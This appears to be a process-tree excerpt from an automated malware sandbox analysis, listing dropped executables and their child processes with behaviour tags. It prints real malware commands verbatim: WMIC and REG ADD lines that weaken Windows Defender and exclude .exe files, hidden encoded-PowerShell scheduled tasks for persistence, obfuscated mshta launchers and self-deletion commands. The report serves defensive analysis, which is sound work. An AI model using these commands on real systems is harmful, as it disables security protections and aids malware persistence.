C:\Users\Admin\Documents\asRd1Lh9BjOa6OqwKJDOQ6Xi.exe"C:\Users\Admin\Documents\asRd1Lh9BjOa6OqwKJDOQ6Xi.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 6567⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 6727⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 6327⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 6647⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 10687⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Documents\3DtfkhBcUq_RPGnbIzWx2JgU.exe"C:\Users\Admin\Documents\3DtfkhBcUq_RPGnbIzWx2JgU.exe"6⤵
-
C:\Users\Admin\Documents\T2TE7fNo6bWqIPl9LTJ6doN7.exe"C:\Users\Admin\Documents\T2TE7fNo6bWqIPl9LTJ6doN7.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\SIL International\SDK Controls Tool\sdkuibuilder.exe"C:\Users\Admin\AppData\Roaming\SIL International\SDK Controls Tool\sdkuibuilder.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 12408⤵
- Program crash
-
C:\Users\Admin\Documents\48iBOGFfZcAHwHGUy8oYSX3n.exe"C:\Users\Admin\Documents\48iBOGFfZcAHwHGUy8oYSX3n.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\9o1aJ_G4MNWWMx6gdx2utYYU.exe"C:\Users\Admin\Documents\9o1aJ_G4MNWWMx6gdx2utYYU.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"7⤵
- Enumerates system info in registry
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xe8,0xec,0xf0,0xc4,0xf4,0x7fffaa9f4f50,0x7fffaa9f4f60,0x7fffaa9f4f708⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,16108591747110591274,5453581067615876761,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:28⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,16108591747110591274,5453581067615876761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2164 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,16108591747110591274,5453581067615876761,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1696 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,16108591747110591274,5453581067615876761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2172 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,16108591747110591274,5453581067615876761,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,16108591747110591274,5453581067615876761,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,16108591747110591274,5453581067615876761,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3032 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,16108591747110591274,5453581067615876761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 /prefetch:88⤵
-
C:\Users\Admin\Documents\8IGE4gE886DTVqb3s53q0cf7.exe"C:\Users\Admin\Documents\8IGE4gE886DTVqb3s53q0cf7.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSA4CF.tmp\Install.exe.\Install.exe7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSBB07.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzaEvFAgj" /SC once /ST 07:26:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzaEvFAgj"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzaEvFAgj"9⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:3210⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 14:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\IVmgCHF.exe\" uG /site_id 394347 /S" /V1 /F9⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\5QdXYw7rNlVD7vtMvDqPvns3.exe"C:\Users\Admin\Documents\5QdXYw7rNlVD7vtMvDqPvns3.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\5QdXYw7rNlVD7vtMvDqPvns3.exe"C:\Users\Admin\Documents\5QdXYw7rNlVD7vtMvDqPvns3.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\nW_gvItndwH96Ia7u6hAStyP.exe"C:\Users\Admin\Documents\nW_gvItndwH96Ia7u6hAStyP.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\nW_gvItndwH96Ia7u6hAStyP.exe"C:\Users\Admin\Documents\nW_gvItndwH96Ia7u6hAStyP.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 8567⤵
- Program crash
-
C:\Users\Admin\Documents\Zyf49LmpmnEcdsNFum19CjRF.exe"C:\Users\Admin\Documents\Zyf49LmpmnEcdsNFum19CjRF.exe"6⤵
-
C:\Users\Admin\Documents\RuqSfrFVBSVnyXlwoHTYRa8e.exe"C:\Users\Admin\Documents\RuqSfrFVBSVnyXlwoHTYRa8e.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\rxJyBKt0ExZbSiqrhVOMbS9A.exe"C:\Users\Admin\Documents\rxJyBKt0ExZbSiqrhVOMbS9A.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\k7pzcJTPzykV4PrUTt_7f0NP.exe"C:\Users\Admin\Documents\k7pzcJTPzykV4PrUTt_7f0NP.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
C:\Users\Admin\Documents\Ssz7olZS8Vx29CqyZyE8bW4Y.exe"C:\Users\Admin\Documents\Ssz7olZS8Vx29CqyZyE8bW4Y.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\cJsH7uQzEOp3fRa5EUpxJxRm.exe"C:\Users\Admin\Documents\cJsH7uQzEOp3fRa5EUpxJxRm.exe"6⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im cJsH7uQzEOp3fRa5EUpxJxRm.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\cJsH7uQzEOp3fRa5EUpxJxRm.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im cJsH7uQzEOp3fRa5EUpxJxRm.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\BiO3wpp_CDFNfV88Yvz50Dwt.exe"C:\Users\Admin\Documents\BiO3wpp_CDFNfV88Yvz50Dwt.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\Hu6UM846W1snw3koNJbBUJoj.exe"C:\Users\Admin\Documents\Hu6UM846W1snw3koNJbBUJoj.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\BheF7ol5r_t3Ssw6RHDGjxZj.exe"C:\Users\Admin\Documents\BheF7ol5r_t3Ssw6RHDGjxZj.exe"6⤵
- Drops file in Drivers directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"7⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xe8,0xec,0xf0,0xc4,0xf4,0x7fffacd14f50,0x7fffacd14f60,0x7fffacd14f708⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1836,14973792267230536593,1887242507222380768,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:28⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,14973792267230536593,1887242507222380768,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1904 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1836,14973792267230536593,1887242507222380768,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1948 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,14973792267230536593,1887242507222380768,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,14973792267230536593,1887242507222380768,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2416 /prefetch:18⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,14973792267230536593,1887242507222380768,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,14973792267230536593,1887242507222380768,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,14973792267230536593,1887242507222380768,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,14973792267230536593,1887242507222380768,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3832 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,14973792267230536593,1887242507222380768,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,14973792267230536593,1887242507222380768,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3364 /prefetch:88⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 7768 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\BheF7ol5r_t3Ssw6RHDGjxZj.exe"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 77688⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 7768 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\BheF7ol5r_t3Ssw6RHDGjxZj.exe"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 77688⤵
- Kills process with taskkill
- Modifies Internet Explorer settings
-
C:\Users\Admin\Documents\OT1TDGbq26ArpDBrG3WfgMj0.exe"C:\Users\Admin\Documents\OT1TDGbq26ArpDBrG3WfgMj0.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
- Checks computer location settings
-
C:\Users\Admin\Documents\WCmazA_xISA1qNzCaaRnLi6O.exe"C:\Users\Admin\Documents\WCmazA_xISA1qNzCaaRnLi6O.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\WCmazA_xISA1qNzCaaRnLi6O.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\WCmazA_xISA1qNzCaaRnLi6O.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\WCmazA_xISA1qNzCaaRnLi6O.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\WCmazA_xISA1qNzCaaRnLi6O.exe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )12⤵
-
